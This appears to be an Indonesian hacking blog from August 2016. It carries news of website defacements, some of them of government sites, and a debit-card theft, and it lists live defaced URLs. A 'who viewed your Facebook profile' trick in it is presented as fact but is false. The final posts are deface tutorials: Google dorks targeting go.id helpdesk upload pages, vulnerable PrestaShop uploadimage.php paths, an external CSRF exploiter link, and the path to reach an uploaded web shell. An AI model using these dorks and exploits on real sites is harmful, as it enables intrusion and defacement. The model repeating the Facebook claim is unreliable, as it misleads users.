Kamis, 25 Agustus 2016

Harga Rokok Naik, Defacer Protes


Saat ini indonesia sedang di ributkan dengan masalah harga rokok yang melunjak naik. Banyak terjadinya pro dan kontra terhadap kenaikan harga tersebut sehingga banyak di perbincangkan di TV, Koran, Website Berita, dan juga Media Sosial lainnya.

Seorang Defacer menyampaikan protesnya kepada pemerintah Indonesia dengan melakukan deface ke beberapa situs web yang diantaranya:
http://www.toyotapolman.com/
http://www.offroadstudios.com/sites/
http://journal.iitta.gov.ua/x.php
http://pjm.pmd.gov.pk/files/index.php
http://desawisatawukirsari.com
 Yang ingin melihat isi protes tersebut bisa klik link di atas.
Atau jika susah membacanya karena teksnya berjalan silahkan klik http://pastebin.com/z9g1NGih


Read more

Kartu Debit Asri Welas Dikuras Hacker , Sisa Rp 2 Juta Rupiah



Artis Asri Welas baru saja kena musibah. Kartu debit salah satu bank swasta miliknya di-hack orang.

"Saya baru dikasih tahu pihak bank. Rekening saya dihack. Cuma disisain dua juta," katanya di kawasan Mampang, Jakarta Selatan, Rabu .

Asri terperanjat dirinya tak pernah merasa ada laporan penggunaan uang di tabungannya. Untungnya, pelaku berhasil dideteksi. Sayang, Asri enggan menyebut nominal kerugian yang dialaminya.

"Sampai merinding pas dikasih tahu. Saya dihubungi bank-nya sudah terdeteksi dan itu ternyata dari salah satu restoran," lanjutnya.

Pelaku diketahui memanfaatkan mesin pembayaran kartu debit untuk mencuri data-data penting si pemilik. Dari situ pelaku berhasil menguras habis isi tabungan Asri.

Asri masih memroses kasus ini ke pihak bank terkait. Kata dia, pihak bank yang akan turun langsung memburu pelaku yang sudah dikantongi identitasnya.


The Real Of Hacker :v
Read more

Mengetahui Siapa Yang Sering Melihat Profil Facebook Kita


Selama ini kita menggunakan sosial media Facebook sebagai alat untuk berrkomunikasi dengan teman, sahabat maupun keluarga. Facebook merupakan media sosial terbesar dengan jumlah penggunaa lebih dari 100 juta orang. Selain sebagai media berkomunikasi, Facebook juga dijadikan sebagai media untuk berpromosi dan mendapatkan penghasilan.

Kalian tentu telah mengenal Facebook dengan baik, setiap hari kamu bermain Facebook, baik sekedar mengupdate status, chating atau bermain games. Tetapi apakah kalian tahu siapa saja orang orang yang sering berkunjung atau membuka profil Facebook kita? Facebook tidak menyediakan fitur yang memungkinkan kita mengetahui para 'stalker' tersebut, berbeda halnya dengan media sosial jaman dulu seperti Friendster.

Oleh karena itu, saya ingin share kepada kalian bagaimana cara agar kita mengetahui siapa saja yang telah mengintip profil FB kita, mungkin saja salah satunya adalah mantan pacar kamu, gebetan atau justru bapak kamu yang mengintip profil FB kamu..??

Oke. Langsung Saja Kita Ke TKP
Berikut caranya adalah sebagai berikut :
1. Pertama login ke Facebook kamu kemudian buka profil (bukan beranda).

2. Di halaman profil, arahkan kursor ke sembarang tempat (bukan pada foto atau tulisan), setelah itu klik kanan dan pilih View Page Source atau tekan CTRL + U.


3. Pada halaman View Page Source silahkan ketik CTRL + F, kemudian ketik Friendslist dikotak Pencarian.




4. Disana ada digit angka seperti "100001931750xxx-2" atau "1000001223614xxx-0" sesudah kata list. Copy digit tersebut ke dalam URL Facebook. Misalnya : http//www.facebook.com/100001931750xxx tanpa diikuti -2 atau -0 lalu enter.

5. Maka akan muncul profil Facebook orang yang sering melihat profil kamu. Hahahaha mudah mudahan bukan profil FB bapak kamu.
Read more

Rabu, 24 Agustus 2016

Penyedia Jasa Pembuatan Skripsi Diretas


Mahasiswa mungkin tau dengan web yang satu ini yang menyediakan jasa pembuatan skripsi untuk mahasiswa yang sedang kesusahan dalam membuat skripsi.

Namun, sekarang website tersebut di retas oleh hacker indonesia dengan nickname "Dedsec".

Di group deface indonesia, hacker tersebut menunjukkan bahwa dia telah berhasil meretas situs web lulusskripsi dan ia juga menyampakain permintaan maaf kepada mahasiswa yang sedang menggunakan jasa pembuatan skripsi dari situs tersebut.



Read more

Senin, 22 Agustus 2016

Retas Situs DPRD Kabupaten Pacitan Defacer Kritik Kinerja Pemerintah

Lagi lagi kasus peretasan website pemerintah. Baru saja situs DPRD Kabupaten Pacitan diretas defaer dengan kodenama Yukinoshita 47. Selain mengubah halaman depan situs, defacer tersebut juga mengkritik habis habisan pemerintah yang dinilai "makan gaji buta".

Selain meng-kritik oknum oknum pemerintah, sang defacer juga memberi saran mengenai keamanan situs yang dia retas seperti saran utnuk segera update CMS dll.
Berikut pesan yang saya kutip dari tampilan deface nya :
Tolong Pak Copot dan Pecat aja semua
Oknum-Oknum PNS dan Pejabat Instansi Pemerintah Terutama Dinas PU dan Dinas Lain yang sering ngadakan tender proyek pemerintah
Kagak Asik Banget Pak Gaji Udah Gede 
Kami Sebagai Kontraktor dan Konsultan Jasa Konstruksi
Capek-Capek Kerja yang nikmati Hasil nya
oknum-oknum PNS, Kuasa Pengguna Anggaran, Pejabat Pembuat Komitmen, Kepala Dinas dan Pihak-Pihak Terkait
Enak Bener ya Jadi PNS dan Kerja Di Instansi Pemerintah yang sering ngadakan Tender Proyek APBD dan APBN 
Kami Sebagai Kontraktor kalo mau dapat proyek harus setor duit dulu 20% dari HPS Proyek nya
Belum Lagi Kami Harus bayarin kedai kopi, bayarin pelacur nya (dia yang ngecroot kami yang bayar enak bener kan), bayarin duit buat entertainment nya dan duit-duit lainnya
Kenapa Aspal Sering Bolong, Bangunan dan Infrastuktur sering kropos ?
Ya iyalah coeg duit yang seharus nya udah modal kerja kami
udah habis buat isi kantong oknum-oknum instansi pemerintah
belum lagi konsultan pengawasan nya nodong kami kalo kagak setor duit ya kami yang habis kena bacod dan bully massal :v wkwkwk
Wajar dong kami sering beli bahan-bahan yang kualitas nya jelek buat nekan biaya biar kerjaan selesai
Udah itu aja pak tolong ya pak copot aja oknum-oknum yang melakukan korupsi berjamaah itu 
di Instansi nya saya melakukan ini hanya iseng sambil menceritakan semua kenyataan dilapangan
biar situs anda tidak ada lagi yang meretas nya gampang pak update CMS ke versi baru,install Honeypot dan aktifkan Web Application Firewall

Sampai berita ini diturunkan , situs DPRD Kabupaten Pacitan juga masih dalam keadaan diretas.
Namun kalian juga bisa melihat mirror nya disini :

Sekian berita pagi hari ini, selamat beraktivitas. (jack/lsc)
Read more

Subdomain Departemen Kesehatan Diretas Defacer Tersakiti

Kali ini kembali LinuxSec mengulas kasus peretasan situs pemerintahan Indonesia. Defacer dengan kodenama Abrasax1337 dari tim Defacer Tersakiti Team meretas subdomain depkes.go.id, tepatnya di bagian Direktorat Jenderal Pencegahan dan Pengendalian Penyakit.

Tampilan depan situs yang beralamat di http://www.pppl.depkes.go.id/ tersebut berubah menjadi berwarna hitam dengan title Hacked by Abrasax1337
Tidak ada pesan khusus kecuali tulisan 
Hello admin, ur s1te g0t pwned!
Menandakan motif dari peretasan tersebut kemungkinan hanya iseng saja.
Sampai berita ini diturunkan belum ada perbaikan dari website yang bersangkutan. Dan tentu saja semakin menambah daftar situs Pemerintah yang dibobol defacer dalam kurun 2016 ini.
Ya semoga saja situs tersebut segera diperbaiki mengingat situs Departemen Kesehatan sendiri merupakan situs penting yang tentunya banyak informasi di dalamnya. (jack/lsc)
Read more

Minggu, 21 Agustus 2016

Tutorial Deface Menggunakan Open News Ticket



assalamualaikum .. ketemu lagi deh sama ane DiffMuRis :V

langsung aja ya tutorial deface menggunakan Open Ticket News :o

dork : inurl:helpdesk intext:choose files here site:go.id

intext:choose files here site:go.id site bisa di gonta ganti kreasikan sendiri yaa :D

inurl:"/helpdesk/new_ticket.php?"site bisa di gonta ganti kreasikan sendiri yaa :D

intext:Helpdesk site:go.id site bisa di gonta ganti kreasikan sendiri yaa :D



Read more

Sabtu, 20 Agustus 2016

Tutorial Deface Menggunakan PrestaShop - Responsive Prestashop 1.6 Arbitrary File Upload



Dork :  


inurl:"/modules/columnadverts/"


inurl:"/modules/homepageadvertise/"


inurl:"/modules/productpageadverts/"


inurl:"/modules/simpleslideshow/"


inurl:"/modules/homepageadvertise2/"


inurl:"/modules/vtemslideshow/"



Gak VULN ? cari target lain lah :v dork nya kembanginnn ... bisa tambah in site:

Exploit :

/modules/columnadverts/uploadimage.php



/modules/homepageadvertise/uploadimage.php



/modules/productpageadverts/uploadimage.php



/modules/simpleslideshow/uploadimage.php



/modules/homepageadvertise2/uploadimage.php



/modules/vtemslideshow/uploadimage.php


csrf exploiter pretashop = http://m2d.asia/csrfpretashop/

ciri ciri vuln ada tulisan error kalo User Not Login engga vuln :D

akses shellnya = targetlu/modules/namapretashopnya/slides/namashellu.php
























Read more